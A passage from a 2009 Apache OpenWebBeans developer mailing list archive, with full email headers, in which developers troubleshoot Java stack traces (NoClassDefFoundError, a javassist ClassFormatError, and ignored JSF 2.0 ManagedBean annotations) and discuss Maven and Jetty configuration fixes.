javax.faces.webapp.FacesServlet.service(FacesServlet.java:311) this was working in June - Question is why is there no dependency bundled ? -Matthias -- Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf --0-1396049640-1251279729=:56713-- From [email protected] Wed Aug 26 10:42:14 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42518 invoked from network); 26 Aug 2009 10:42:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 10:42:14 -0000 Received: (qmail 75226 invoked by uid 500); 26 Aug 2009 10:42:14 -0000 Delivered-To: [email protected] Received: (qmail 75195 invoked by uid 500); 26 Aug 2009 10:42:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75185 invoked by uid 99); 26 Aug 2009 10:42:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 10:42:14 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 10:42:02 +0000 Received: by ewy4 with SMTP id 4so25051ewy.27 for <[email protected]>; Wed, 26 Aug 2009 03:41:42 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=3/PPFhgCAUC3sAakAWn5p0vageVDfHq90eUHBen0HEo=; b=HbETuc7cknv5pan8RF3uWLET/myvSsz1BBtb1V95vhvU64NzVby2I4GT7LxbR3+EKO hv3A8QK6OAA6/IJMSbB9Suk7K+fwN/mJS9qes7ngOWlSxh1ERoamcZKkPA5EHa+Ebx4l 8bms7O6rVDX07Rl6bI4n1ZjG01IxvmfpBtkWI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=K6te2nlxJdRNasaPqnyEwPvmaFZ0XScmpNSMg6+7qXrnvxd9ItRUK+6xxGsT7rOV6A J6dboU9Tl3kJ109MM4NlkVpMcKWEDP5J8nems3+grVENDZBGEb9iryNHDOjBPfoPExFF 9ytJBPB6kLuBCz7sCKzinMlKP8bOu5M6TNwt0= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id g17mr8086522ebd.9.1251283302017; Wed, 26 Aug 2009 03:41:42 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Wed, 26 Aug 2009 12:41:41 +0200 X-Google-Sender-Auth: b1005cd616264d04 Message-ID: <[email protected]> Subject: Re: java.lang.NoClassDefFoundError: javax/interceptor/AroundInvoke From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org it is my own application :) I added the dependency and set the scope to RUNTIME. So that seems to be the "work-around" for Jetty On Wed, Aug 26, 2009 at 11:42 AM, Gurkan Erdogdu<[email protected]> w= rote: > Hi Matthias; > > We bundle jar via Jetty profile becuase of other Java EE servers contains= this jar. So you can run samples via -Pjetty like this > > mvn jetty:run -Pjetty > > Hope,this works. > > Thanks; > > > > > ________________________________ > From: Matthias Wessendorf <[email protected]> > To: [email protected] > Sent: Wednesday, August 26, 2009 11:35:51 AM > Subject: java.lang.NoClassDefFoundError: javax/interceptor/AroundInvoke > > Hi, > > running TRUNK and JSF 2.0, I am getting this when accessing a XHTML page: > > java.lang.NoClassDefFoundError: javax/interceptor/AroundInvoke > =A0 =A0at org.apache.webbeans.intercept.InterceptorUtil.isWebBeansBusines= sMethod(InterceptorUtil.java:60) > =A0 =A0at org.apache.webbeans.intercept.InterceptorHandler.invoke(Interce= ptorHandler.java:68) > =A0 =A0at org.apache.webbeans.conversation.ConversationImpl_$$_javassist_= 0.updateTimeOut(ConversationImpl_$$_javassist_0.java) > =A0 =A0at org.apache.webbeans.jsf.WebBeansPhaseListener.beforePhase(WebBe= ansPhaseListener.java:167) > =A0 =A0at com.sun.faces.lifecycle.Phase.handleBeforePhase(Phase.java:212) > =A0 =A0at com.sun.faces.lifecycle.Phase.doPhase(Phase.java:100) > =A0 =A0at com.sun.faces.lifecycle.LifecycleImpl.render(LifecycleImpl.java= :139) > =A0 =A0at javax.faces.webapp.FacesServlet.service(FacesServlet.java:311) > > > this was working in June - Question is why is there no dependency bundled= ? > > -Matthias > > -- > Matthias Wessendorf > > blog: http://matthiaswessendorf.wordpress.com/ > sessions: http://www.slideshare.net/mwessendorf > twitter: http://twitter.com/mwessendorf > > > > --=20 Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 10:46:31 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43236 invoked from network); 26 Aug 2009 10:46:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 10:46:31 -0000 Received: (qmail 81665 invoked by uid 500); 26 Aug 2009 10:46:31 -0000 Delivered-To: [email protected] Received: (qmail 81643 invoked by uid 500); 26 Aug 2009 10:46:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81633 invoked by uid 99); 26 Aug 2009 10:46:31 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 10:46:31 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FUZZY_CPILL,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 10:46:20 +0000 Received: by ewy4 with SMTP id 4so27789ewy.27 for <[email protected]>; Wed, 26 Aug 2009 03:45:59 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; bh=Hdv/oC4KW04qnjD99l6x9smgFBqfxOj6tNhXzmpHLgo=; b=UukSy3GCFZU26DqeAn4PJd6Zny9Dv9pm3VyE81rzElYmBn8BUb5Hy0Td2EcoKigz7u 0sgo0ateLHCvceJfoaiSDi5OSga+5A9vtfzhQeq54WVpUlUvAYmQeVVqDMvrRL1k+wki K1IFCVucSSOJ3HkfnwgSVdwqPUUeUKrBKKx1E= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:date:x-google-sender-auth:message-id:subject :from:to:content-type:content-transfer-encoding; b=NPwnO8tR8p0hKVLDEDkR4rCJ45VyVj8YgzMsxiYrF+0v/9SB5AZN295zcAOwu/xD1m 0mJGxWR9rlbS3q8F0QelCGlMnffeIn8tYOF+/Oy4nbG4E0kKrnULeCLKWdityL1ZYqqT YeP+ULw7jLVvmZqfclLKt4Lb16+eZGMmSjoR8= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id n18mr7723286ebd.13.1251283558452; Wed, 26 Aug 2009 03:45:58 -0700 (PDT) Date: Wed, 26 Aug 2009 12:45:58 +0200 X-Google-Sender-Auth: 7f651695c5fbdede Message-ID: <[email protected]> Subject: javax.enterprise.inject.CreationException: java.lang.ClassFormatError: Duplicate interface name ... From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hi my code is here: https://facesgoodies.googlecode.com/svn/CGN/trunk/ running the command "mvn jetty:run" and accessing this URL: http://localhost:8080/faces/cocktail.xhtml I am getting this: javax.enterprise.inject.CreationException: java.lang.ClassFormatError: Duplicate interface name in class file de/jug/cologne/webbeans/model/CocktailSet_$$_javassist_2 at org.apache.webbeans.component.AbstractBean.create(AbstractBean.java:174) at org.apache.webbeans.context.AbstractContext.getInstance(AbstractContext.java:173) at org.apache.webbeans.context.AbstractContext.get(AbstractContext.java:147) at org.apache.webbeans.intercept.InterceptorHandler.invoke(InterceptorHandler.java:65) at de.jug.cologne.webbeans.CocktailBean_$$_javassist_1.isInShopping(CocktailBean_$$_javassist_1.java) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) at java.lang.reflect.Method.invoke(Method.java:597) at javax.el.BeanELResolver.getValue(BeanELResolver.java:293) at javax.el.CompositeELResolver.getValue(CompositeELResolver.java:175) at com.sun.faces.el.FacesCompositeELResolver.getValue(FacesCompositeELResolver.java:72) at com.sun.el.parser.AstValue.getValue(AstValue.java:138) at com.sun.el.ValueExpressionImpl.getValue(ValueExpressionImpl.java:206) at com.sun.faces.facelets.el.TagValueExpression.getValue(TagValueExpression.java:102) at javax.faces.component.ComponentStateHelper.eval(ComponentStateHelper.java:181) at javax.faces.component.UIComponentBase.isRendered(UIComponentBase.java:412) at javax.faces.component.UIComponent.encodeAll(UIComponent.java:1603) at javax.faces.render.Renderer.encodeChildren(Renderer.java:168) at javax.faces.component.UIComponentBase.encodeChildren(UIComponentBase.java:844) at javax.faces.component.UIComponent.encodeAll(UIComponent.java:1609) at javax.faces.component.UIComponent.encodeAll(UIComponent.java:1612) at javax.faces.component.UIComponent.encodeAll(UIComponent.java:1612) at com.sun.faces.application.view.FaceletViewHandlingStrategy.renderView(FaceletViewHandlingStrategy.java:271) at com.sun.faces.application.view.MultiViewHandler.renderView(MultiViewHandler.java:126) at com.sun.faces.lifecycle.RenderResponsePhase.execute(RenderResponsePhase.java:124) at com.sun.faces.lifecycle.Phase.doPhase(Phase.java:103) at com.sun.faces.lifecycle.LifecycleImpl.render(LifecycleImpl.java:139) at javax.faces.webapp.FacesServlet.service(FacesServlet.java:311) at org.mortbay.jetty.servlet.ServletHolder.handle(ServletHolder.java:502) I am not exactly sure what the really means. No I have done no investigations :-) -- Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 10:56:01 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45298 invoked from network); 26 Aug 2009 10:56:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 10:56:01 -0000 Received: (qmail 92017 invoked by uid 500); 26 Aug 2009 10:56:01 -0000 Delivered-To: [email protected] Received: (qmail 91998 invoked by uid 500); 26 Aug 2009 10:56:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91985 invoked by uid 99); 26 Aug 2009 10:56:01 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 10:56:01 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ey-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 10:55:49 +0000 Received: by ey-out-1920.google.com with SMTP id 3so138086eyh.4 for <[email protected]>; Wed, 26 Aug 2009 03:55:29 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:date :x-google-sender-auth:message-id:subject:from:to:content-type; bh=FFSDs//NKvo3rt6HKE0/v4iCFeoFZaPIvYGNYvc/eMM=; b=eahgmGye1Q35pKYLqNNYwZaRuIZ5GDrfIcGrtDLMwAmJ2qSuu225+ML+eQAsudatnP uQjbSpYar3NQ9nhLS0oXuGDZ4uHaywbd+MFK3LNH3N7HYeVxyj5voYkAThTOyBckn3kU OCZZ1LNUDijNwruV7NAH4jsdqB5TMqLUiR83c= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:date:x-google-sender-auth:message-id:subject :from:to:content-type; b=Xq0M1Y8mr5jSOFDzktF0AMtTCg0Ajz7B7cv5jmpNjpJKd3vR93TyuleC/13RphBYeo RTXd6g2j5dRuVMkRSqSZrGfjLF0EmuHj9R8QknclOheT1me+HtpdMrudrLZ09zt6kKDl ymv1sxlUZiw9YvzrBAkmivU0MUq7HKoEwOaFo= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id z15mr6912281ebc.35.1251284129521; Wed, 26 Aug 2009 03:55:29 -0700 (PDT) Date: Wed, 26 Aug 2009 12:55:29 +0200 X-Google-Sender-Auth: 1ed557d08fed66cb Message-ID: <[email protected]> Subject: WebBeans "eating" JSF 2.0 annotations ? From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 X-Virus-Checked: Checked by ClamAV on apache.org Hi, is it possible that the current trunk is _eating_ JSF 2.0 annotations ? <someCode> ... import javax.faces.bean.ManagedBean; import javax.faces.bean.SessionScoped; @ManagedBean(name="playersBean") @SessionScoped public class ViewParamsBean { ... </someCode> In June (before reflecting the javax.enterprise.context changes) it was working. Now expressions like #{playersBean} are simply ignored ;-) Demo project is here: https://facesgoodies.googlecode.com/svn/CGN/trunk/ -Matthias -- Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 13:43:26 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4165 invoked from network); 26 Aug 2009 13:43:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 13:43:26 -0000 Received: (qmail 46155 invoked by uid 500); 26 Aug 2009 13:43:26 -0000 Delivered-To: [email protected] Received: (qmail 46123 invoked by uid 500); 26 Aug 2009 13:43:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46108 invoked by uid 99); 26 Aug 2009 13:43:26 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 13:43:26 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FUZZY_CPILL,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 13:43:14 +0000 Received: by ewy4 with SMTP id 4so165587ewy.27 for <[email protected]>; Wed, 26 Aug 2009 06:42:53 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=zd6PH+ZNcgzBMTclU+DlQeVvgoRzFUExCmPJlddyxx4=; b=pKnhhYJuf17enZysAGonLNcE0sIw4rEC6EzP9udbPMVcoM21HqxnrCg3hNBy5Ub43K e85KO101v8InJN1IXzmF+ssYzdWyB5JulFkEc29PsaTkj9Tz8SdpcNDbbdl/MQ0C2WdL cKZU6lnrR+W5IrEbpdhoV5NFpypZXtrl9jIU4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=C2s1k17JN9VEHoAHQNo7+qz3d+0IHRaEazJaqHIGauWVXxXCq5Iu6GwJ/7gBqxlxA4 VEQMCtzcnpiGjtatEEOfnW71Hg6R/JmBBbLs7nKzCw71f/HEJFrop/JbRKNeMMua2cJZ Gsh8kJ1HE829RMNfqKCkFXXXWhfIhKGIQv7io= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id k4mr7914891eba.25.1251294169006; Wed, 26 Aug 2009 06:42:49 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Wed, 26 Aug 2009 16:42:48 +0300 Message-ID: <[email protected]> Subject: Re: javax.enterprise.inject.CreationException: java.lang.ClassFormatError: Duplicate interface name ... From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174c12427404de04720ba07e X-Virus-Checked: Checked by ClamAV on apache.org --0015174c12427404de04720ba07e Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit There may be multiple same jars in your classpath. 2009/8/26 Matthias Wessendorf <[email protected]> > Hi > > my code is here: > https://facesgoodies.googlecode.com/svn/CGN/trunk/ > > running the command "mvn jetty:run" > > and accessing this URL: > http://localhost:8080/faces/cocktail.xhtml > > I am getting this: > > javax.enterprise.inject.CreationException: java.lang.ClassFormatError: > Duplicate interface name in class file > de/jug/cologne/webbeans/model/CocktailSet_$$_javassist_2 > at > org.apache.webbeans.component.AbstractBean.create(AbstractBean.java:174) > at > org.apache.webbeans.context.AbstractContext.getInstance(AbstractContext.java:173) > at > org.apache.webbeans.context.AbstractContext.get(AbstractContext.java:147) > at > org.apache.webbeans.intercept.InterceptorHandler.invoke(InterceptorHandler.java:65) > at > de.jug.cologne.webbeans.CocktailBean_$$_javassist_1.isInShopping(CocktailBean_$$_javassist_1.java) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:597) > at javax.el.BeanELResolver.getValue(BeanELResolver.java:293) > at > javax.el.CompositeELResolver.getValue(CompositeELResolver.java:175) > at > com.sun.faces.el.FacesCompositeELResolver.getValue(FacesCompositeELResolver.java:72) > at com.sun.el.parser.AstValue.getValue(AstValue.java:138) > at > com.sun.el.ValueExpressionImpl.getValue(ValueExpressionImpl.java:206) > at > com.sun.faces.facelets.el.TagValueExpression.getValue(TagValueExpression.java:102) > at > javax.faces.component.ComponentStateHelper.eval(ComponentStateHelper.java:181) > at > javax.faces.component.UIComponentBase.isRendered(UIComponentBase.java:412) > at > javax.faces.component.UIComponent.encodeAll(UIComponent.java:1603) > at javax.faces.render.Renderer.encodeChildren(Renderer.java:168) > at > javax.faces.component.UIComponentBase.encodeChildren(UIComponentBase.java:844) > at > javax.faces.component.UIComponent.encodeAll(UIComponent.java:1609) > at > javax.faces.component.UIComponent.encodeAll(UIComponent.java:1612) > at > javax.faces.component.UIComponent.encodeAll(UIComponent.java:1612) > at > com.sun.faces.application.view.FaceletViewHandlingStrategy.renderView(FaceletViewHandlingStrategy.java:271) > at > com.sun.faces.application.view.MultiViewHandler.renderView(MultiViewHandler.java:126) > at > com.sun.faces.lifecycle.RenderResponsePhase.execute(RenderResponsePhase.java:124) > at com.sun.faces.lifecycle.Phase.doPhase(Phase.java:103) > at > com.sun.faces.lifecycle.LifecycleImpl.render(LifecycleImpl.java:139) > at javax.faces.webapp.FacesServlet.service(FacesServlet.java:311) > at > org.mortbay.jetty.servlet.ServletHolder.handle(ServletHolder.java:502) > > I am not exactly sure what the really means. No I have done no > investigations :-) > > > -- > Matthias Wessendorf > > blog: http://matthiaswessendorf.wordpress.com/ > sessions: http://www.slideshare.net/mwessendorf > twitter: http://twitter.com/mwessendorf > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174c12427404de04720ba07e-- From [email protected] Wed Aug 26 13:45:35 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4997 invoked from network); 26 Aug 2009 13:45:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 13:45:35 -0000 Received: (qmail 48080 invoked by uid 500); 26 Aug 2009 13:45:35 -0000 Delivered-To: [email protected] Received: (qmail 48062 invoked by uid 500); 26 Aug 2009 13:45:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48052 invoked by uid 99); 26 Aug 2009 13:45:34 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 13:45:34 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 13:45:23 +0000 Received: by ewy4 with SMTP id 4so167742ewy.27 for <[email protected]>; Wed, 26 Aug 2009 06:45:02 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=LoRU8xjSxU4LU216qxODdf/BlL2SMJiPaHHvc7D39sU=; b=C2DcaUfzVVmqO15aTfSHZeqdgE2pECDgpeXTH3Ip8Q2Z/guGS1KdmeEqNeDHYcSMZt fkl14oYhRPfq6oAV5oaDtpKPtR7PCYnJ7OlK9RTVFLOR+rDEKg/4Tyn5tikQFAWuFqrX cpTDY2y2k1H+Jc9oae7JARdlYbzx8NnkAqDG4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=mHZqPahDAnxR7tCRP4sZv9J2wEFXl1h2vH8ni+gO+mLk7KEppR02kfGqJ1XiKv4VCz WKyE1GEKUe22sJCo9nWFtdJWGavnxWzgVtfCIHXrO7ZvUZ+A51Z43LdegkMe7lOvmMXE uX20/fb68pR7sVYEeOIHRHJL4YjauNCW3ONRc= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id o18mr7899062eba.59.1251294301980; Wed, 26 Aug 2009 06:45:01 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Wed, 26 Aug 2009 16:45:01 +0300 Message-ID: <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174c3d4661332404720ba845 X-Virus-Checked: Checked by ClamAV on apache.org --0015174c3d4661332404720ba845 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit It must not eat. But one point, You still use old XML configuration file format. As a default OWB uses new XML format. Add https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samples/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties in your project resources/META-INF/openwebbeans folder and sure that all libraries are ok. You can look necessary libs from guess.war . You can create it from mvn package -Pjetty. --Gurkan 2009/8/26 Matthias Wessendorf <[email protected]> > Hi, > > is it possible that the current trunk is _eating_ JSF 2.0 annotations ? > > <someCode> > ... > import javax.faces.bean.ManagedBean; > import javax.faces.bean.SessionScoped; > > @ManagedBean(name="playersBean") > @SessionScoped > public class ViewParamsBean > { > ... > </someCode> > > In June (before reflecting the javax.enterprise.context changes) it was > working. > Now expressions like #{playersBean} are simply ignored ;-) > > Demo project is here: > https://facesgoodies.googlecode.com/svn/CGN/trunk/ > > -Matthias > > > -- > Matthias Wessendorf > > blog: http://matthiaswessendorf.wordpress.com/ > sessions: http://www.slideshare.net/mwessendorf > twitter: http://twitter.com/mwessendorf > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174c3d4661332404720ba845-- From [email protected] Wed Aug 26 15:09:35 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53841 invoked from network); 26 Aug 2009 15:09:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:09:35 -0000 Received: (qmail 35689 invoked by uid 500); 26 Aug 2009 15:09:35 -0000 Delivered-To: [email protected] Received: (qmail 35673 invoked by uid 500); 26 Aug 2009 15:09:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35653 invoked by uid 99); 26 Aug 2009 15:09:34 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:09:34 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FUZZY_CPILL,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f215.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:09:21 +0000 Received: by ewy11 with SMTP id 11so248234ewy.35 for <[email protected]>; Wed, 26 Aug 2009 08:09:01 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=rUNuWuVEkuyWQ/Q4cZK0BgR5rsMkYpp57PA4U5gJgkU=; b=iiGzJBubpxj5z6VqsM7Cf8OVtbuuuX0tZ6aIDzSYzGWOCyjGMKdtvRNv4HOjWaokbm bx86uMg+a44SwaAuERfvBTaS0NvVLN5ajME/lQpi2WULWO2N5dOOneJExLds8yvzdfdN y4FJJqdPT2ApRQMjf/TYwVmxeUD1h1ihzfpac= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=qaR6+rJ+49ajpsWUB2EL3FvzV8dEPe27v4R3Z5zYStEgO0vbqBGvTOXQloUNvhNw2N AJP2cK7csbaCjKwBJyU1TH/LJber2HpVP1X4bba+SLPCke53R1Dz0JbXDoI0knBGRSvn MX24jlYVlTkD6YdqEtTsrPB1IhqKpHjXXdsIY= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id s8mr8344941eba.69.1251299340876; Wed, 26 Aug 2009 08:09:00 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Wed, 26 Aug 2009 17:09:00 +0200 X-Google-Sender-Auth: 8be5cfefdcd9c55e Message-ID: <[email protected]> Subject: Re: javax.enterprise.inject.CreationException: java.lang.ClassFormatError: Duplicate interface name ... From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org nope On Wed, Aug 26, 2009 at 3:42 PM, Gurkan Erdogdu<[email protected]> w= rote: > There may be multiple same jars in your classpath. > > 2009/8/26 Matthias Wessendorf <[email protected]> > >> Hi >> >> my code is here: >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ >> >> running the command "mvn jetty:run" >> >> and accessing this URL: >> http://localhost:8080/faces/cocktail.xhtml >> >> I am getting this: >> >> javax.enterprise.inject.CreationException: java.lang.ClassFormatError: >> Duplicate interface name in class file >> de/jug/cologne/webbeans/model/CocktailSet_$$_javassist_2 >> =A0 =A0 =A0 =A0at >> org.apache.webbeans.component.AbstractBean.create(AbstractBean.java:174) >> =A0 =A0 =A0 =A0at >> org.apache.webbeans.context.AbstractContext.getInstance(AbstractContext.= java:173) >> =A0 =A0 =A0 =A0at >> 